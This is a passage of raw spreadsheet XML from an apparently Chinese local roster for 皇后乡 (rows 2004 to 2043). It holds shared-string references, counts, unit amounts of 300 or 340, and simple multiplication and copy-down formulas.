      <c r="K2004" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2005" ht="23" customHeight="1" spans="1:11">
      <c r="A2005" s="13" t="s">
        <v>5324</v>
      </c>
      <c r="B2005" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2005" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2005" s="14" t="s">
        <v>5325</v>
      </c>
      <c r="E2005" s="14" t="s">
        <v>5326</v>
      </c>
      <c r="F2005" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2005" s="14">
        <v>3</v>
      </c>
      <c r="H2005" s="14">
        <v>265</v>
      </c>
      <c r="I2005" s="14">
        <f>H2005*G2005</f>
        <v>795</v>
      </c>
      <c r="J2005" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2005" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2006" ht="23" customHeight="1" spans="1:11">
      <c r="A2006" s="13" t="s">
        <v>5327</v>
      </c>
      <c r="B2006" s="14" t="str">
        <f>B2005</f>
        <v>皇后乡</v>
      </c>
      <c r="C2006" s="14" t="str">
        <f>C2005</f>
        <v>皇后乡</v>
      </c>
      <c r="D2006" s="13" t="s">
        <v>5328</v>
      </c>
      <c r="E2006" s="13" t="s">
        <v>5329</v>
      </c>
      <c r="F2006" s="14" t="str">
        <f>F2005</f>
        <v>4113210615</v>
      </c>
      <c r="G2006" s="14"/>
      <c r="H2006" s="14"/>
      <c r="I2006" s="14"/>
      <c r="J2006" s="14"/>
      <c r="K2006" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2007" ht="23" customHeight="1" spans="1:11">
      <c r="A2007" s="13" t="s">
        <v>5330</v>
      </c>
      <c r="B2007" s="14" t="str">
        <f>B2006</f>
        <v>皇后乡</v>
      </c>
      <c r="C2007" s="14" t="str">
        <f>C2006</f>
        <v>皇后乡</v>
      </c>
      <c r="D2007" s="19" t="s">
        <v>5331</v>
      </c>
      <c r="E2007" s="19" t="s">
        <v>5332</v>
      </c>
      <c r="F2007" s="14" t="str">
        <f>F2006</f>
        <v>4113210615</v>
      </c>
      <c r="G2007" s="14"/>
      <c r="H2007" s="14"/>
      <c r="I2007" s="14"/>
      <c r="J2007" s="14"/>
      <c r="K2007" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2008" ht="23" customHeight="1" spans="1:11">
      <c r="A2008" s="13" t="s">
        <v>5333</v>
      </c>
      <c r="B2008" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2008" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2008" s="14" t="s">
        <v>5334</v>
      </c>
      <c r="E2008" s="14" t="s">
        <v>4927</v>
      </c>
      <c r="F2008" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2008" s="14">
        <v>1</v>
      </c>
      <c r="H2008" s="14">
        <v>340</v>
      </c>
      <c r="I2008" s="14">
        <f t="shared" ref="I2008:I2022" si="100">H2008*G2008</f>
        <v>340</v>
      </c>
      <c r="J2008" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2008" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2009" ht="23" customHeight="1" spans="1:11">
      <c r="A2009" s="13" t="s">
        <v>5335</v>
      </c>
      <c r="B2009" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2009" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2009" s="14" t="s">
        <v>5336</v>
      </c>
      <c r="E2009" s="14" t="s">
        <v>4976</v>
      </c>
      <c r="F2009" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2009" s="14">
        <v>1</v>
      </c>
      <c r="H2009" s="14">
        <v>340</v>
      </c>
      <c r="I2009" s="14">
        <f t="shared" si="100"/>
        <v>340</v>
      </c>
      <c r="J2009" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2009" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2010" ht="23" customHeight="1" spans="1:11">
      <c r="A2010" s="13" t="s">
        <v>5337</v>
      </c>
      <c r="B2010" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2010" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2010" s="14" t="s">
        <v>5338</v>
      </c>
      <c r="E2010" s="14" t="s">
        <v>5001</v>
      </c>
      <c r="F2010" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2010" s="14">
        <v>1</v>
      </c>
      <c r="H2010" s="14">
        <v>340</v>
      </c>
      <c r="I2010" s="14">
        <f t="shared" si="100"/>
        <v>340</v>
      </c>
      <c r="J2010" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2010" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2011" ht="23" customHeight="1" spans="1:11">
      <c r="A2011" s="13" t="s">
        <v>5339</v>
      </c>
      <c r="B2011" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2011" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2011" s="14" t="s">
        <v>5340</v>
      </c>
      <c r="E2011" s="14" t="s">
        <v>4945</v>
      </c>
      <c r="F2011" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2011" s="14">
        <v>1</v>
      </c>
      <c r="H2011" s="14">
        <v>340</v>
      </c>
      <c r="I2011" s="14">
        <f t="shared" si="100"/>
        <v>340</v>
      </c>
      <c r="J2011" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2011" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2012" ht="23" customHeight="1" spans="1:11">
      <c r="A2012" s="13" t="s">
        <v>5341</v>
      </c>
      <c r="B2012" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2012" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2012" s="14" t="s">
        <v>5342</v>
      </c>
      <c r="E2012" s="14" t="s">
        <v>5343</v>
      </c>
      <c r="F2012" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2012" s="14">
        <v>2</v>
      </c>
      <c r="H2012" s="14">
        <v>300</v>
      </c>
      <c r="I2012" s="14">
        <f t="shared" si="100"/>
        <v>600</v>
      </c>
      <c r="J2012" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2012" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2013" ht="23" customHeight="1" spans="1:11">
      <c r="A2013" s="13" t="s">
        <v>5344</v>
      </c>
      <c r="B2013" s="14" t="str">
        <f>B2012</f>
        <v>皇后乡</v>
      </c>
      <c r="C2013" s="14" t="str">
        <f>C2012</f>
        <v>皇后乡</v>
      </c>
      <c r="D2013" s="13" t="s">
        <v>5345</v>
      </c>
      <c r="E2013" s="13" t="s">
        <v>5346</v>
      </c>
      <c r="F2013" s="14" t="str">
        <f>F2012</f>
        <v>4113210615</v>
      </c>
      <c r="G2013" s="14"/>
      <c r="H2013" s="14"/>
      <c r="I2013" s="14"/>
      <c r="J2013" s="14"/>
      <c r="K2013" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2014" ht="23" customHeight="1" spans="1:11">
      <c r="A2014" s="13" t="s">
        <v>5347</v>
      </c>
      <c r="B2014" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2014" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2014" s="14" t="s">
        <v>5348</v>
      </c>
      <c r="E2014" s="14" t="s">
        <v>5237</v>
      </c>
      <c r="F2014" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2014" s="14">
        <v>1</v>
      </c>
      <c r="H2014" s="14">
        <v>340</v>
      </c>
      <c r="I2014" s="14">
        <f>H2014*G2014</f>
        <v>340</v>
      </c>
      <c r="J2014" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2014" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2015" ht="23" customHeight="1" spans="1:11">
      <c r="A2015" s="13" t="s">
        <v>5349</v>
      </c>
      <c r="B2015" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2015" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2015" s="14" t="s">
        <v>5350</v>
      </c>
      <c r="E2015" s="14" t="s">
        <v>5351</v>
      </c>
      <c r="F2015" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2015" s="14">
        <v>1</v>
      </c>
      <c r="H2015" s="14">
        <v>340</v>
      </c>
      <c r="I2015" s="14">
        <f>H2015*G2015</f>
        <v>340</v>
      </c>
      <c r="J2015" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2015" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2016" ht="23" customHeight="1" spans="1:11">
      <c r="A2016" s="13" t="s">
        <v>5352</v>
      </c>
      <c r="B2016" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2016" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2016" s="14" t="s">
        <v>5353</v>
      </c>
      <c r="E2016" s="14" t="s">
        <v>5022</v>
      </c>
      <c r="F2016" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2016" s="14">
        <v>2</v>
      </c>
      <c r="H2016" s="14">
        <v>300</v>
      </c>
      <c r="I2016" s="14">
        <f>H2016*G2016</f>
        <v>600</v>
      </c>
      <c r="J2016" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2016" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2017" ht="23" customHeight="1" spans="1:11">
      <c r="A2017" s="13" t="s">
        <v>5354</v>
      </c>
      <c r="B2017" s="14" t="str">
        <f>B2016</f>
        <v>皇后乡</v>
      </c>
      <c r="C2017" s="14" t="str">
        <f>C2016</f>
        <v>皇后乡</v>
      </c>
      <c r="D2017" s="13" t="s">
        <v>5355</v>
      </c>
      <c r="E2017" s="13" t="s">
        <v>5356</v>
      </c>
      <c r="F2017" s="14" t="str">
        <f>F2016</f>
        <v>4113210615</v>
      </c>
      <c r="G2017" s="14"/>
      <c r="H2017" s="14"/>
      <c r="I2017" s="14"/>
      <c r="J2017" s="14"/>
      <c r="K2017" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2018" ht="23" customHeight="1" spans="1:11">
      <c r="A2018" s="13" t="s">
        <v>5357</v>
      </c>
      <c r="B2018" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2018" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2018" s="14" t="s">
        <v>5358</v>
      </c>
      <c r="E2018" s="14" t="s">
        <v>4954</v>
      </c>
      <c r="F2018" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2018" s="14">
        <v>2</v>
      </c>
      <c r="H2018" s="14">
        <v>300</v>
      </c>
      <c r="I2018" s="14">
        <f>H2018*G2018</f>
        <v>600</v>
      </c>
      <c r="J2018" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2018" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2019" ht="23" customHeight="1" spans="1:11">
      <c r="A2019" s="13" t="s">
        <v>5359</v>
      </c>
      <c r="B2019" s="14" t="str">
        <f>B2018</f>
        <v>皇后乡</v>
      </c>
      <c r="C2019" s="14" t="str">
        <f>C2018</f>
        <v>皇后乡</v>
      </c>
      <c r="D2019" s="13" t="s">
        <v>5360</v>
      </c>
      <c r="E2019" s="13" t="s">
        <v>5098</v>
      </c>
      <c r="F2019" s="14" t="str">
        <f>F2018</f>
        <v>4113210615</v>
      </c>
      <c r="G2019" s="14"/>
      <c r="H2019" s="14"/>
      <c r="I2019" s="14"/>
      <c r="J2019" s="14"/>
      <c r="K2019" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2020" ht="23" customHeight="1" spans="1:11">
      <c r="A2020" s="13" t="s">
        <v>5361</v>
      </c>
      <c r="B2020" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2020" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2020" s="14" t="s">
        <v>5362</v>
      </c>
      <c r="E2020" s="14" t="s">
        <v>4927</v>
      </c>
      <c r="F2020" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2020" s="14">
        <v>1</v>
      </c>
      <c r="H2020" s="14">
        <v>340</v>
      </c>
      <c r="I2020" s="14">
        <f>H2020*G2020</f>
        <v>340</v>
      </c>
      <c r="J2020" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2020" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2021" ht="23" customHeight="1" spans="1:11">
      <c r="A2021" s="13" t="s">
        <v>5363</v>
      </c>
      <c r="B2021" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2021" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2021" s="14" t="s">
        <v>5364</v>
      </c>
      <c r="E2021" s="14" t="s">
        <v>3913</v>
      </c>
      <c r="F2021" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2021" s="14">
        <v>2</v>
      </c>
      <c r="H2021" s="14">
        <v>300</v>
      </c>
      <c r="I2021" s="14">
        <f>H2021*G2021</f>
        <v>600</v>
      </c>
      <c r="J2021" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2021" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2022" ht="23" customHeight="1" spans="1:11">
      <c r="A2022" s="13" t="s">
        <v>5365</v>
      </c>
      <c r="B2022" s="14" t="str">
        <f>B2021</f>
        <v>皇后乡</v>
      </c>
      <c r="C2022" s="14" t="str">
        <f>C2021</f>
        <v>皇后乡</v>
      </c>
      <c r="D2022" s="13" t="s">
        <v>5366</v>
      </c>
      <c r="E2022" s="13" t="s">
        <v>5367</v>
      </c>
      <c r="F2022" s="14" t="str">
        <f>F2021</f>
        <v>4113210615</v>
      </c>
      <c r="G2022" s="14"/>
      <c r="H2022" s="14"/>
      <c r="I2022" s="14"/>
      <c r="J2022" s="14"/>
      <c r="K2022" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2023" ht="23" customHeight="1" spans="1:11">
      <c r="A2023" s="13" t="s">
        <v>5368</v>
      </c>
      <c r="B2023" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2023" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2023" s="14" t="s">
        <v>5369</v>
      </c>
      <c r="E2023" s="14" t="s">
        <v>5370</v>
      </c>
      <c r="F2023" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2023" s="14">
        <v>1</v>
      </c>
      <c r="H2023" s="14">
        <v>340</v>
      </c>
      <c r="I2023" s="14">
        <f>H2023*G2023</f>
        <v>340</v>
      </c>
      <c r="J2023" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2023" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2024" ht="23" customHeight="1" spans="1:11">
      <c r="A2024" s="13" t="s">
        <v>5371</v>
      </c>
      <c r="B2024" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2024" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2024" s="14" t="s">
        <v>5372</v>
      </c>
      <c r="E2024" s="14" t="s">
        <v>4945</v>
      </c>
      <c r="F2024" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2024" s="14">
        <v>1</v>
      </c>
      <c r="H2024" s="14">
        <v>340</v>
      </c>
      <c r="I2024" s="14">
        <f>H2024*G2024</f>
        <v>340</v>
      </c>
      <c r="J2024" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2024" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2025" ht="23" customHeight="1" spans="1:11">
      <c r="A2025" s="13" t="s">
        <v>5373</v>
      </c>
      <c r="B2025" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2025" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2025" s="14" t="s">
        <v>5374</v>
      </c>
      <c r="E2025" s="14" t="s">
        <v>4981</v>
      </c>
      <c r="F2025" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2025" s="14">
        <v>2</v>
      </c>
      <c r="H2025" s="14">
        <v>300</v>
      </c>
      <c r="I2025" s="14">
        <f>H2025*G2025</f>
        <v>600</v>
      </c>
      <c r="J2025" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2025" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2026" ht="23" customHeight="1" spans="1:11">
      <c r="A2026" s="13" t="s">
        <v>5375</v>
      </c>
      <c r="B2026" s="14" t="str">
        <f>B2025</f>
        <v>皇后乡</v>
      </c>
      <c r="C2026" s="14" t="str">
        <f>C2025</f>
        <v>皇后乡</v>
      </c>
      <c r="D2026" s="13" t="s">
        <v>5376</v>
      </c>
      <c r="E2026" s="13" t="s">
        <v>5377</v>
      </c>
      <c r="F2026" s="14" t="str">
        <f>F2025</f>
        <v>4113210615</v>
      </c>
      <c r="G2026" s="14"/>
      <c r="H2026" s="14"/>
      <c r="I2026" s="14"/>
      <c r="J2026" s="14"/>
      <c r="K2026" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2027" ht="23" customHeight="1" spans="1:11">
      <c r="A2027" s="13" t="s">
        <v>5378</v>
      </c>
      <c r="B2027" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2027" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2027" s="14" t="s">
        <v>5379</v>
      </c>
      <c r="E2027" s="14" t="s">
        <v>4962</v>
      </c>
      <c r="F2027" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2027" s="14">
        <v>2</v>
      </c>
      <c r="H2027" s="14">
        <v>300</v>
      </c>
      <c r="I2027" s="14">
        <f>H2027*G2027</f>
        <v>600</v>
      </c>
      <c r="J2027" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2027" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2028" ht="23" customHeight="1" spans="1:11">
      <c r="A2028" s="13" t="s">
        <v>5380</v>
      </c>
      <c r="B2028" s="14" t="str">
        <f>B2027</f>
        <v>皇后乡</v>
      </c>
      <c r="C2028" s="14" t="str">
        <f>C2027</f>
        <v>皇后乡</v>
      </c>
      <c r="D2028" s="13" t="s">
        <v>5381</v>
      </c>
      <c r="E2028" s="13" t="s">
        <v>5382</v>
      </c>
      <c r="F2028" s="14" t="str">
        <f>F2027</f>
        <v>4113210615</v>
      </c>
      <c r="G2028" s="14"/>
      <c r="H2028" s="14"/>
      <c r="I2028" s="14"/>
      <c r="J2028" s="14"/>
      <c r="K2028" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2029" ht="23" customHeight="1" spans="1:11">
      <c r="A2029" s="13" t="s">
        <v>5383</v>
      </c>
      <c r="B2029" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2029" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2029" s="14" t="s">
        <v>5384</v>
      </c>
      <c r="E2029" s="14" t="s">
        <v>5170</v>
      </c>
      <c r="F2029" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2029" s="14">
        <v>1</v>
      </c>
      <c r="H2029" s="14">
        <v>340</v>
      </c>
      <c r="I2029" s="14">
        <f>H2029*G2029</f>
        <v>340</v>
      </c>
      <c r="J2029" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2029" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2030" ht="23" customHeight="1" spans="1:11">
      <c r="A2030" s="13" t="s">
        <v>5385</v>
      </c>
      <c r="B2030" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2030" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2030" s="14" t="s">
        <v>5386</v>
      </c>
      <c r="E2030" s="14" t="s">
        <v>5387</v>
      </c>
      <c r="F2030" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2030" s="14">
        <v>1</v>
      </c>
      <c r="H2030" s="14">
        <v>340</v>
      </c>
      <c r="I2030" s="14">
        <f>H2030*G2030</f>
        <v>340</v>
      </c>
      <c r="J2030" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2030" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2031" ht="23" customHeight="1" spans="1:11">
      <c r="A2031" s="13" t="s">
        <v>5388</v>
      </c>
      <c r="B2031" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2031" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2031" s="14" t="s">
        <v>5389</v>
      </c>
      <c r="E2031" s="14" t="s">
        <v>4942</v>
      </c>
      <c r="F2031" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2031" s="14">
        <v>2</v>
      </c>
      <c r="H2031" s="14">
        <v>300</v>
      </c>
      <c r="I2031" s="14">
        <f>H2031*G2031</f>
        <v>600</v>
      </c>
      <c r="J2031" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2031" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2032" ht="23" customHeight="1" spans="1:11">
      <c r="A2032" s="13" t="s">
        <v>5390</v>
      </c>
      <c r="B2032" s="14" t="str">
        <f>B2031</f>
        <v>皇后乡</v>
      </c>
      <c r="C2032" s="14" t="str">
        <f>C2031</f>
        <v>皇后乡</v>
      </c>
      <c r="D2032" s="19" t="s">
        <v>5391</v>
      </c>
      <c r="E2032" s="19" t="s">
        <v>5392</v>
      </c>
      <c r="F2032" s="14" t="str">
        <f>F2031</f>
        <v>4113210615</v>
      </c>
      <c r="G2032" s="14"/>
      <c r="H2032" s="14"/>
      <c r="I2032" s="14"/>
      <c r="J2032" s="14"/>
      <c r="K2032" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2033" ht="23" customHeight="1" spans="1:11">
      <c r="A2033" s="13" t="s">
        <v>5393</v>
      </c>
      <c r="B2033" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2033" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2033" s="14" t="s">
        <v>5394</v>
      </c>
      <c r="E2033" s="14" t="s">
        <v>5034</v>
      </c>
      <c r="F2033" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2033" s="14">
        <v>2</v>
      </c>
      <c r="H2033" s="14">
        <v>300</v>
      </c>
      <c r="I2033" s="14">
        <f>H2033*G2033</f>
        <v>600</v>
      </c>
      <c r="J2033" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2033" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2034" ht="23" customHeight="1" spans="1:11">
      <c r="A2034" s="13" t="s">
        <v>5395</v>
      </c>
      <c r="B2034" s="14" t="str">
        <f>B2033</f>
        <v>皇后乡</v>
      </c>
      <c r="C2034" s="14" t="str">
        <f>C2033</f>
        <v>皇后乡</v>
      </c>
      <c r="D2034" s="19" t="s">
        <v>5396</v>
      </c>
      <c r="E2034" s="19" t="s">
        <v>5397</v>
      </c>
      <c r="F2034" s="14" t="str">
        <f>F2033</f>
        <v>4113210615</v>
      </c>
      <c r="G2034" s="14"/>
      <c r="H2034" s="14"/>
      <c r="I2034" s="14"/>
      <c r="J2034" s="14"/>
      <c r="K2034" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2035" ht="23" customHeight="1" spans="1:11">
      <c r="A2035" s="13" t="s">
        <v>5398</v>
      </c>
      <c r="B2035" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2035" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2035" s="14" t="s">
        <v>5399</v>
      </c>
      <c r="E2035" s="14" t="s">
        <v>5028</v>
      </c>
      <c r="F2035" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2035" s="14">
        <v>1</v>
      </c>
      <c r="H2035" s="14">
        <v>340</v>
      </c>
      <c r="I2035" s="14">
        <f>H2035*G2035</f>
        <v>340</v>
      </c>
      <c r="J2035" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2035" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2036" ht="23" customHeight="1" spans="1:11">
      <c r="A2036" s="13" t="s">
        <v>5400</v>
      </c>
      <c r="B2036" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2036" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2036" s="14" t="s">
        <v>5401</v>
      </c>
      <c r="E2036" s="14" t="s">
        <v>5402</v>
      </c>
      <c r="F2036" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2036" s="14">
        <v>1</v>
      </c>
      <c r="H2036" s="14">
        <v>340</v>
      </c>
      <c r="I2036" s="14">
        <f>H2036*G2036</f>
        <v>340</v>
      </c>
      <c r="J2036" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2036" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2037" ht="23" customHeight="1" spans="1:11">
      <c r="A2037" s="13" t="s">
        <v>5403</v>
      </c>
      <c r="B2037" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2037" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2037" s="14" t="s">
        <v>5404</v>
      </c>
      <c r="E2037" s="14" t="s">
        <v>5405</v>
      </c>
      <c r="F2037" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2037" s="14">
        <v>1</v>
      </c>
      <c r="H2037" s="14">
        <v>340</v>
      </c>
      <c r="I2037" s="14">
        <f>H2037*G2037</f>
        <v>340</v>
      </c>
      <c r="J2037" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2037" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2038" ht="23" customHeight="1" spans="1:11">
      <c r="A2038" s="13" t="s">
        <v>5406</v>
      </c>
      <c r="B2038" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2038" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2038" s="14" t="s">
        <v>5407</v>
      </c>
      <c r="E2038" s="14" t="s">
        <v>4945</v>
      </c>
      <c r="F2038" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2038" s="14">
        <v>2</v>
      </c>
      <c r="H2038" s="14">
        <v>300</v>
      </c>
      <c r="I2038" s="14">
        <f>H2038*G2038</f>
        <v>600</v>
      </c>
      <c r="J2038" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2038" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2039" ht="23" customHeight="1" spans="1:11">
      <c r="A2039" s="13" t="s">
        <v>5408</v>
      </c>
      <c r="B2039" s="14" t="str">
        <f>B2038</f>
        <v>皇后乡</v>
      </c>
      <c r="C2039" s="14" t="str">
        <f>C2038</f>
        <v>皇后乡</v>
      </c>
      <c r="D2039" s="19" t="s">
        <v>5409</v>
      </c>
      <c r="E2039" s="19" t="s">
        <v>5410</v>
      </c>
      <c r="F2039" s="14" t="str">
        <f>F2038</f>
        <v>4113210615</v>
      </c>
      <c r="G2039" s="14"/>
      <c r="H2039" s="14"/>
      <c r="I2039" s="14"/>
      <c r="J2039" s="14"/>
      <c r="K2039" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2040" ht="23" customHeight="1" spans="1:11">
      <c r="A2040" s="13" t="s">
        <v>5411</v>
      </c>
      <c r="B2040" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2040" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2040" s="14" t="s">
        <v>5412</v>
      </c>
      <c r="E2040" s="14" t="s">
        <v>5180</v>
      </c>
      <c r="F2040" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2040" s="14">
        <v>1</v>
      </c>
      <c r="H2040" s="14">
        <v>340</v>
      </c>
      <c r="I2040" s="14">
        <f>H2040*G2040</f>
        <v>340</v>
      </c>
      <c r="J2040" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2040" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2041" ht="23" customHeight="1" spans="1:11">
      <c r="A2041" s="13" t="s">
        <v>5413</v>
      </c>
      <c r="B2041" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2041" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2041" s="14" t="s">
        <v>5414</v>
      </c>
      <c r="E2041" s="14" t="s">
        <v>5415</v>
      </c>
      <c r="F2041" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2041" s="14">
        <v>1</v>
      </c>
      <c r="H2041" s="14">
        <v>340</v>
      </c>
      <c r="I2041" s="14">
        <f>H2041*G2041</f>
        <v>340</v>
      </c>
      <c r="J2041" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2041" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2042" ht="23" customHeight="1" spans="1:11">
      <c r="A2042" s="13" t="s">
        <v>5416</v>
      </c>
      <c r="B2042" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2042" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2042" s="14" t="s">
        <v>5417</v>
      </c>
      <c r="E2042" s="14" t="s">
        <v>4945</v>
      </c>
      <c r="F2042" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2042" s="14">
        <v>1</v>
      </c>
      <c r="H2042" s="14">
        <v>340</v>
      </c>
      <c r="I2042" s="14">
        <f>H2042*G2042</f>
        <v>340</v>
      </c>
      <c r="J2042" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2042" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2043" ht="23" customHeight="1" spans="1:11">
      <c r="A2043" s="13" t="s">
        <v>5418</v>
      </c>
      <c r="B2043" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2043" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2043" s="14" t="s">
        <v>5419</v>
      </c>
      <c r="E2043" s="14" t="s">
        <v>5064</v>
      </c>
      <c r="F2043" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2043" s="14">
        <v>2</v>
      </c>
